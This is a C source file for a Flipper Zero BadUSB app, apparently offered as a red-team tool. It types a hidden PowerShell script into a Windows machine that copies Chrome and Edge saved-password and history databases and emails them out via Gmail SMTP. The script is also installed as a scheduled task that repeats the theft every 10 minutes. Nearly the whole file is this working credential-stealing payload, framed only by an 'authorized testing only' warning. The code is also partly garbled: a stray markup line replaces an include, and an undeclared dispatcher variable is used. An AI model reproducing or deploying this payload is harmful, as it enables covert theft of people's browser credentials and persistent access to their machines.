#include <furi.h>
<parameter name="furi_hal.h">
#include <gui/gui.h>
#include <input/input.h>
#include <furi_hal_usb_hid.h>
#include <notification/notification_messages.h>
#include <gui/modules/text_input.h>

/*
 * Browser Sync to Gmail - FAP Application
 * 
 * Purpose: Interactive BadUSB payload for syncing browser data to Gmail
 * Author: yogeshjoga
 * Category: Data Exfiltration / Red Team
 * 
 * Features:
 * - GUI for Gmail address input
 * - GUI for App Password input
 * - Automated BadUSB payload execution
 * - Creates scheduled Windows task
 * - Syncs browser data every 10 minutes
 * 
 * WARNING: For authorized testing only!
 */

#define TAG "BrowserSync"
#define MAX_EMAIL_LEN 64
#define MAX_PASSWORD_LEN 32

typedef enum {
    StateEmailInput,
    StatePasswordInput,
    StateConfirm,
    StateExecuting,
    StateComplete,
} AppState;

typedef struct {
    AppState state;
    char email[MAX_EMAIL_LEN];
    char password[MAX_PASSWORD_LEN];
    uint32_t payload_line;
    bool execute_payload;
    FuriMutex* mutex;
} BrowserSyncApp;

// HID typing functions
static void hid_type_string(const char* str) {
    for(size_t i = 0; str[i] != '\0'; i++) {
        furi_hal_hid_kb_press(str[i]);
        furi_delay_ms(10);
        furi_hal_hid_kb_release(str[i]);
        furi_delay_ms(30); // Typing delay
    }
}

static void hid_press_key(uint16_t key) {
    furi_hal_hid_kb_press(key);
    furi_delay_ms(10);
    furi_hal_hid_kb_release_all();
}

static void hid_type_enter() {
    hid_press_key(HID_KEYBOARD_RETURN);
    furi_delay_ms(300);
}

// Execute the browser sync payload
static void execute_payload(BrowserSyncApp* app) {
    FURI_LOG_I(TAG, "Executing browser sync payload...");
    
    // Initial delay
    furi_delay_ms(2000);
    
    // Open PowerShell
    hid_press_key(HID_KEYBOARD_L_GUI | HID_KEYBOARD_R); // WIN+R
    furi_delay_ms(500);
    hid_type_string("powershell -ExecutionPolicy Bypass -WindowStyle Hidden");
    hid_type_enter();
    furi_delay_ms(2000);
    
    // Create sync directory
    hid_type_string("$syncDir = \"$env:APPDATA\\BrowserSync\"");
    hid_type_enter();
    furi_delay_ms(300);
    
    hid_type_string("New-Item -ItemType Directory -Force -Path $syncDir | Out-Null");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Create the main PowerShell script with embedded credentials
    hid_type_string("@\"");
    hid_type_enter();
    furi_delay_ms(200);
    
    // Script header
    hid_type_string("# Browser Data Sync to Gmail");
    hid_type_enter();
    hid_type_string("# Auto-generated by Flipper Zero");
    hid_type_enter();
    furi_delay_ms(300);
    
    // Embed credentials
    hid_type_string("`$ErrorActionPreference = 'SilentlyContinue'");
    hid_type_enter();
    
    char email_line[128];
    snprintf(email_line, sizeof(email_line), "`$targetEmail = '%s'", app->email);
    hid_type_string(email_line);
    hid_type_enter();
    
    char pass_line[128];
    snprintf(pass_line, sizeof(pass_line), "`$appPassword = '%s'", app->password);
    hid_type_string(pass_line);
    hid_type_enter();
    furi_delay_ms(300);
    
    hid_type_string("`$computerName = `$env:COMPUTERNAME");
    hid_type_enter();
    hid_type_string("`$userName = `$env:USERNAME");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Add all the extraction functions (condensed for space)
    // Internet check function
    hid_type_string("function Test-InternetConnection {");
    hid_type_enter();
    hid_type_string("    try { `$test = Test-Connection -ComputerName 8.8.8.8 -Count 1 -Quiet; return `$test } catch { return `$false }");
    hid_type_enter();
    hid_type_string("}");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Chrome password function
    hid_type_string("function Get-ChromePasswords {");
    hid_type_enter();
    hid_type_string("    `$p = \"`$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\"; if(Test-Path `$p) { `$t = \"`$env:TEMP\\cp_$(Get-Random).db\"; Copy-Item `$p `$t -Force; return `$t }; return `$null");
    hid_type_enter();
    hid_type_string("}");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Chrome history function
    hid_type_string("function Get-ChromeHistory {");
    hid_type_enter();
    hid_type_string("    `$p = \"`$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\History\"; if(Test-Path `$p) { `$t = \"`$env:TEMP\\ch_$(Get-Random).db\"; Copy-Item `$p `$t -Force; return `$t }; return `$null");
    hid_type_enter();
    hid_type_string("}");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Edge password function
    hid_type_string("function Get-EdgePasswords {");
    hid_type_enter();
    hid_type_string("    `$p = \"`$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Login Data\"; if(Test-Path `$p) { `$t = \"`$env:TEMP\\ep_$(Get-Random).db\"; Copy-Item `$p `$t -Force; return `$t }; return `$null");
    hid_type_enter();
    hid_type_string("}");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Edge history function
    hid_type_string("function Get-EdgeHistory {");
    hid_type_enter();
    hid_type_string("    `$p = \"`$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\History\"; if(Test-Path `$p) { `$t = \"`$env:TEMP\\eh_$(Get-Random).db\"; Copy-Item `$p `$t -Force; return `$t }; return `$null");
    hid_type_enter();
    hid_type_string("}");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Archive creation function
    hid_type_string("function Create-DataArchive {");
    hid_type_enter();
    hid_type_string("    `$ts = Get-Date -Format 'yyyyMMdd_HHmmss'; `$zip = \"`$env:TEMP\\BrowserData_`$ts.zip\"; `$tmp = \"`$env:TEMP\\BE_$(Get-Random)\"; New-Item -ItemType Directory -Path `$tmp -Force | Out-Null");
    hid_type_enter();
    furi_delay_ms(500);
    
    hid_type_string("    `$cp = Get-ChromePasswords; `$ch = Get-ChromeHistory; `$ep = Get-EdgePasswords; `$eh = Get-EdgeHistory");
    hid_type_enter();
    hid_type_string("    if(`$cp) { Copy-Item `$cp \"`$tmp\\chrome_pass.db\" -Force; Remove-Item `$cp -Force }");
    hid_type_enter();
    hid_type_string("    if(`$ch) { Copy-Item `$ch \"`$tmp\\chrome_hist.db\" -Force; Remove-Item `$ch -Force }");
    hid_type_enter();
    hid_type_string("    if(`$ep) { Copy-Item `$ep \"`$tmp\\edge_pass.db\" -Force; Remove-Item `$ep -Force }");
    hid_type_enter();
    hid_type_string("    if(`$eh) { Copy-Item `$eh \"`$tmp\\edge_hist.db\" -Force; Remove-Item `$eh -Force }");
    hid_type_enter();
    furi_delay_ms(500);
    
    hid_type_string("    @\"");
    hid_type_enter();
    hid_type_string("Computer: `$computerName");
    hid_type_enter();
    hid_type_string("User: `$userName");
    hid_type_enter();
    hid_type_string("Time: `$(Get-Date)");
    hid_type_enter();
    hid_type_string("\"@ | Out-File \"`$tmp\\info.txt\"");
    hid_type_enter();
    furi_delay_ms(300);
    
    hid_type_string("    Compress-Archive -Path \"`$tmp\\*\" -DestinationPath `$zip -Force; Remove-Item `$tmp -Recurse -Force; return `$zip");
    hid_type_enter();
    hid_type_string("}");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Email function
    hid_type_string("function Send-DataEmail {");
    hid_type_enter();
    hid_type_string("    param(`$zipPath)");
    hid_type_enter();
    hid_type_string("    try {");
    hid_type_enter();
    hid_type_string("        `$smtp = New-Object System.Net.Mail.SmtpClient('smtp.gmail.com', 587); `$smtp.EnableSsl = `$true");
    hid_type_enter();
    hid_type_string("        `$smtp.Credentials = New-Object System.Net.NetworkCredential(`$targetEmail, `$appPassword)");
    hid_type_enter();
    hid_type_string("        `$msg = New-Object System.Net.Mail.MailMessage; `$msg.From = `$targetEmail; `$msg.To.Add(`$targetEmail)");
    hid_type_enter();
    hid_type_string("        `$msg.Subject = \"Browser Sync - `$computerName - `$(Get-Date -Format 'yyyy-MM-dd HH:mm')\"");
    hid_type_enter();
    hid_type_string("        `$msg.Body = \"Automated sync from `$computerName (`$userName)\"");
    hid_type_enter();
    hid_type_string("        if(Test-Path `$zipPath) { `$att = New-Object System.Net.Mail.Attachment(`$zipPath); `$msg.Attachments.Add(`$att) }");
    hid_type_enter();
    hid_type_string("        `$smtp.Send(`$msg); `$msg.Dispose(); if(Test-Path `$zipPath) { Remove-Item `$zipPath -Force }");
    hid_type_enter();
    hid_type_string("    } catch { }");
    hid_type_enter();
    hid_type_string("}");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Main execution
    hid_type_string("if(Test-InternetConnection) { `$arc = Create-DataArchive; if(`$arc) { Send-DataEmail -zipPath `$arc } }");
    hid_type_enter();
    furi_delay_ms(300);
    
    // End of script
    hid_type_string("\"@ | Out-File -FilePath \"`$syncDir\\BrowserSync.ps1\" -Encoding UTF8");
    hid_type_enter();
    furi_delay_ms(1000);
    
    // Create batch wrapper
    hid_type_string("@\"");
    hid_type_enter();
    hid_type_string("@echo off");
    hid_type_enter();
    hid_type_string("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File \"%APPDATA%\\BrowserSync\\BrowserSync.ps1\"");
    hid_type_enter();
    hid_type_string("\"@ | Out-File -FilePath \"`$syncDir\\RunSync.bat\" -Encoding ASCII");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Create scheduled task
    hid_type_string("`$action = New-ScheduledTaskAction -Execute \"`$syncDir\\RunSync.bat\"");
    hid_type_enter();
    furi_delay_ms(300);
    
    hid_type_string("`$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 10) -RepetitionDuration ([TimeSpan]::MaxValue)");
    hid_type_enter();
    furi_delay_ms(500);
    
    hid_type_string("`$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -RunOnlyIfNetworkAvailable");
    hid_type_enter();
    furi_delay_ms(500);
    
    hid_type_string("`$principal = New-ScheduledTaskPrincipal -UserId \"`$env:USERNAME\" -LogonType S4U -RunLevel Limited");
    hid_type_enter();
    furi_delay_ms(500);
    
    hid_type_string("Register-ScheduledTask -TaskName \"BrowserSyncService\" -Action `$action -Trigger `$trigger -Settings `$settings -Principal `$principal -Force | Out-Null");
    hid_type_enter();
    furi_delay_ms(1000);
    
    // Run initial sync
    hid_type_string("Start-Process -FilePath \"`$syncDir\\RunSync.bat\" -WindowStyle Hidden");
    hid_type_enter();
    furi_delay_ms(500);
    
    // Exit
    hid_type_string("exit");
    hid_type_enter();
    
    FURI_LOG_I(TAG, "Payload execution complete");
}

// Text input callbacks
static void email_input_callback(void* context) {
    BrowserSyncApp* app = context;
    furi_mutex_acquire(app->mutex, FuriWaitForever);
    app->state = StatePasswordInput;
    furi_mutex_release(app->mutex);
}

static void password_input_callback(void* context) {
    BrowserSyncApp* app = context;
    furi_mutex_acquire(app->mutex, FuriWaitForever);
    app->state = StateConfirm;
    furi_mutex_release(app->mutex);
}

// Main render callback
static void render_callback(Canvas* canvas, void* ctx) {
    BrowserSyncApp* app = ctx;
    furi_mutex_acquire(app->mutex, FuriWaitForever);
    
    canvas_clear(canvas);
    canvas_set_font(canvas, FontPrimary);
    
    switch(app->state) {
    case StateConfirm:
        canvas_draw_str(canvas, 2, 10, "Browser Sync Setup");
        canvas_set_font(canvas, FontSecondary);
        
        char email_display[32];
        snprintf(email_display, sizeof(email_display), "Email: %.25s", app->email);
        canvas_draw_str(canvas, 2, 25, email_display);
        
        canvas_draw_str(canvas, 2, 35, "Password: ******");
        canvas_draw_str(canvas, 2, 50, "Ready to execute");
        canvas_draw_str(canvas, 2, 62, "OK:Run Back:Cancel");
        break;
        
    case StateExecuting:
        canvas_draw_str(canvas, 2, 10, "Executing Payload");
        canvas_set_font(canvas, FontSecondary);
        canvas_draw_str(canvas, 2, 25, "Creating sync script...");
        canvas_draw_str(canvas, 2, 40, "Setting up scheduler...");
        canvas_draw_str(canvas, 2, 55, "Please wait...");
        break;
        
    case StateComplete:
        canvas_draw_str(canvas, 2, 10, "Setup Complete!");
        canvas_set_font(canvas, FontSecondary);
        canvas_draw_str(canvas, 2, 25, "Scheduled task created");
        canvas_draw_str(canvas, 2, 35, "Syncs every 10 minutes");
        canvas_draw_str(canvas, 2, 50, "Check your Gmail!");
        canvas_draw_str(canvas, 2, 62, "Back:Exit");
        break;
        
    default:
        break;
    }
    
    furi_mutex_release(app->mutex);
}

// Input callback
static void input_callback(InputEvent* input_event, void* ctx) {
    furi_assert(ctx);
    FuriMessageQueue* queue = ctx;
    furi_message_queue_put(queue, input_event, FuriWaitForever);
}

// Main app entry point
int32_t browser_sync_app(void* p) {
    UNUSED(p);
    
    FURI_LOG_I(TAG, "Browser Sync app started");
    
    // Initialize app
    BrowserSyncApp* app = malloc(sizeof(BrowserSyncApp));
    app->state = StateEmailInput;
    app->mutex = furi_mutex_alloc(FuriMutexTypeNormal);
    app->execute_payload = false;
    memset(app->email, 0, sizeof(app->email));
    memset(app->password, 0, sizeof(app->password));
    
    // Setup GUI
    Gui* gui = furi_record_open(RECORD_GUI);
    
    // Text input for email
    TextInput* email_input = text_input_alloc();
    text_input_set_header_text(email_input, "Enter Gmail Address");
    text_input_set_result_callback(
        email_input,
        email_input_callback,
        app,
        app->email,
        MAX_EMAIL_LEN,
        true);
    
    // Text input for password
    TextInput* password_input = text_input_alloc();
    text_input_set_header_text(password_input, "Enter App Password");
    text_input_set_result_callback(
        password_input,
        password_input_callback,
        app,
        app->password,
        MAX_PASSWORD_LEN,
        true);
    
    // Main view port
    ViewPort* view_port = view_port_alloc();
    view_port_draw_callback_set(view_port, render_callback, app);
    
    FuriMessageQueue* queue = furi_message_queue_alloc(8, sizeof(InputEvent));
    view_port_input_callback_set(view_port, input_callback, queue);
    
    // Notifications
    NotificationApp* notifications = furi_record_open(RECORD_NOTIFICATION);
    
    // Main loop
    bool running = true;
    InputEvent event;
    
    while(running) {
        AppState current_state = app->state;
        
        if(current_state == StateEmailInput) {
            view_dispatcher_add_view(dispatcher, 0, text_input_get_view(email_input));
            view_dispatcher_switch_to_view(dispatcher, 0);
            
        } else if(current_state == StatePasswordInput) {
            view_dispatcher_add_view(dispatcher, 1, text_input_get_view(password_input));
            view_dispatcher_switch_to_view(dispatcher, 1);
            
        } else if(current_state == StateConfirm || current_state == StateExecuting || current_state == StateComplete) {
            gui_add_view_port(gui, view_port, GuiLayerFullscreen);
            
            if(furi_message_queue_get(queue, &event, 100) == FuriStatusOk) {
                if(event.type == InputTypeShort) {
                    if(event.key == InputKeyOk && current_state == StateConfirm) {
                        app->state = StateExecuting;
                        app->execute_payload = true;
                        notification_message(notifications, &sequence_blink_start_cyan);
                        
                        // Execute payload
                        furi_hal_hid_connect();
                        furi_delay_ms(500);
                        execute_payload(app);
                        furi_hal_hid_disconnect();
                        
                        app->state = StateComplete;
                        notification_message(notifications, &sequence_success);
                        
                    } else if(event.key == InputKeyBack) {
                        running = false;
                    }
                }
            }
            
            view_port_update(view_port);
        }
    }
    
    // Cleanup
    notification_message(notifications, &sequence_blink_stop);
    furi_record_close(RECORD_NOTIFICATION);
    
    gui_remove_view_port(gui, view_port);
    view_port_free(view_port);
    
    text_input_free(email_input);
    text_input_free(password_input);
    
    furi_record_close(RECORD_GUI);
    furi_message_queue_free(queue);
    
    furi_mutex_free(app->mutex);
    free(app);
    
    FURI_LOG_I(TAG, "Browser Sync app stopped");
    return 0;
}
